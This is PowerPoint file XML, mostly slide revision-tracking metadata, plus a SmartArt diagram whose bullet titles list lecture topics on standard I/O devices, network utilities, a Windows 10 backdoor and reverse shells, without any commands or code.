          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:07.361" v="1120"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="9" creationId="{EBE43208-63F1-0F25-9853-8A3970CEA455}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:07.361" v="1120"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="10" creationId="{DA560197-D065-9045-D9BD-8A5FDAC98D00}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:12.322" v="1123"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="12" creationId="{9990DE07-2B7F-B1C6-458F-62A54B9D7768}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:12.322" v="1123"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="13" creationId="{28FF1866-BB77-C985-BA9D-746090F9E9FC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:28:00.166" v="1037" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="951356934" sldId="506"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:39.692" v="779" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:39.692" v="779" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:07.319" v="1020" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:spMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:54.257" v="783" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:16.205" v="775" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:spMk id="13" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:29.736" v="778" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:spMk id="15" creationId="{05A84F03-3BE5-4BFF-9DA4-E19E32FD84AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="10" creationId="{4FFFE899-AC25-2316-2225-FF61F11242D4}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:31.481" v="1025"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="13" creationId="{5E0BAF26-E70C-32CD-85C5-348CA092D882}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="18" creationId="{3ADB0E17-734B-35F4-0483-1C8BF150F094}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:40.326" v="1031"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="21" creationId="{4E695CFF-1D2C-4273-1C31-6D7D48FECC1E}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:46.957" v="1034"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="24" creationId="{760F4072-955C-7D20-F667-223D0A0BB030}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:03:19.527" v="764" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:picMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:39.692" v="779" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:picMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:03:46.703" v="768" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:picMk id="14" creationId="{34B348BD-A2F6-402E-B0EF-FD6D02594ACF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:31.481" v="1025"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="3" creationId="{A806AB91-F5ED-D09C-5416-1C1790B0E281}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:31.481" v="1025"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="4" creationId="{745D203D-AA7B-0F29-F1BC-67818FB7E702}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="8" creationId="{CD55B8C8-DFC8-D328-CFE5-E0EF67763EAD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="9" creationId="{30E44AA8-E4AB-D84B-6D7C-19B58426C5FD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="16" creationId="{B55186A4-12A8-0F06-BD98-3C1C19E10B26}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="17" creationId="{8D4E8F2B-787C-FA74-48A6-FB09DCB8EB0E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:40.326" v="1031"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="19" creationId="{89453CD5-A27C-BEEA-1C3C-25033544C231}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:40.326" v="1031"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="20" creationId="{9F38F2D8-6546-53E9-AA19-8B251B406328}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:46.957" v="1034"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="22" creationId="{8975A4BB-7325-6AFE-302E-B6E9D7FF22F8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:46.957" v="1034"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="23" creationId="{390D2FF0-33B9-0789-38EE-9B33CFC3C6EC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:58.902" v="1035" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="25" creationId="{827DF6C7-4049-53AB-E939-22D611165851}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:59.365" v="1036" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="26" creationId="{3D27415F-F638-7958-0F63-39073B0D9045}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:28:00.166" v="1037" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="27" creationId="{5C4485D2-763A-154F-9E32-3A29273361A0}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:39.692" v="779" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:cxnSpMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:47.562" v="782" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:cxnSpMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:20:42.424" v="822" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1385115538" sldId="507"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:20:42.424" v="822" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1385115538" sldId="507"/>
            <ac:spMk id="2" creationId="{949834CC-EE51-45E6-AC16-55466089F92B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:05:20.301" v="785" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1385115538" sldId="507"/>
            <ac:picMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:50:59.491" v="261" actId="12"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="494372939" sldId="508"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:50:59.491" v="261" actId="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="494372939" sldId="508"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:46:23.285" v="206" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3063836972" sldId="510"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:44:47.110" v="79" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063836972" sldId="510"/>
            <ac:spMk id="2" creationId="{9FF1AB65-73B9-4E0B-A8C8-4BF7E6CF0611}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:44:47.110" v="79" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063836972" sldId="510"/>
            <ac:spMk id="3" creationId="{AFEFD8AF-D50C-45E5-902E-7AAD718F43F6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:45:03.863" v="88" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063836972" sldId="510"/>
            <ac:spMk id="4" creationId="{D3BC4124-87C8-4743-8E1C-273BB86DC97E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:46:23.285" v="206" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063836972" sldId="510"/>
            <ac:spMk id="5" creationId="{7032E3DA-7F7C-4137-9921-D28D7A17B054}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T16:33:43.294" v="762" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2910342646" sldId="511"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T16:28:55.874" v="522" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2910342646" sldId="511"/>
            <ac:spMk id="2" creationId="{B8E04ABA-149E-4CE9-98C4-9F02F632CB5C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T16:33:43.294" v="762" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2910342646" sldId="511"/>
            <ac:spMk id="3" creationId="{E557CAF6-7771-4DA8-97BD-9E8E765BDF8E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:20:13.660" v="1203" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1504836039" sldId="512"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:04:43.926" v="1139" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1504836039" sldId="512"/>
            <ac:spMk id="2" creationId="{07CD4BDF-0DE5-09BD-9D84-5B31B3A1A165}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:20:13.660" v="1203" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1504836039" sldId="512"/>
            <ac:spMk id="3" creationId="{791C76E6-6D86-29EF-DD53-CB8A670CA499}"/>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D95D1-0E6C-4B88-BBA5-0D119E601AC8}"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47510470-AECF-4261-9C7F-974910BA2CE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Standard input/output/error devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A119B126-E38B-44E9-B96B-788AABCDDB69}" type="parTrans" cxnId="{F8B62351-4458-44FE-8FD3-35F22C53C5FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F95AD54-CC49-43B7-ABDC-9E013F437FDB}" type="sibTrans" cxnId="{F8B62351-4458-44FE-8FD3-35F22C53C5FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CCC89E2-AFCB-4F1D-BE15-C30775E14DD5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Network utilities use standard devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37D8D7F6-82EC-4278-A3CE-35C0D79BBAA7}" type="parTrans" cxnId="{9A7EC821-EE47-42E5-8731-C3AE4A48640F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0AE10F1-4F4D-491A-B374-C2F63919659A}" type="sibTrans" cxnId="{9A7EC821-EE47-42E5-8731-C3AE4A48640F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A85E831-83AC-4CBE-A04A-158534B0B496}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Create a backdoor at Window 10/Remote File Acquisition</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8708527-29F1-45AD-84C4-85CC773FA03E}" type="parTrans" cxnId="{23A21A2E-69CE-46CD-8AA2-2DE4FA99C049}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A8947B02-B569-42F0-BA8D-7C4208421369}" type="sibTrans" cxnId="{23A21A2E-69CE-46CD-8AA2-2DE4FA99C049}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{82D17439-F26F-4E24-A7CC-217EAA8E9CFB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Reverse shell</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{411B400C-231E-453F-91CE-5A6C51D34DC3}" type="parTrans" cxnId="{8E4D4E13-7B87-40C4-839A-B60BD86EA001}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C32BD346-8926-4CB0-B79C-6724304B462F}" type="sibTrans" cxnId="{8E4D4E13-7B87-40C4-839A-B60BD86EA001}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="outerComposite" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="5"/>
          <dgm:dir/>
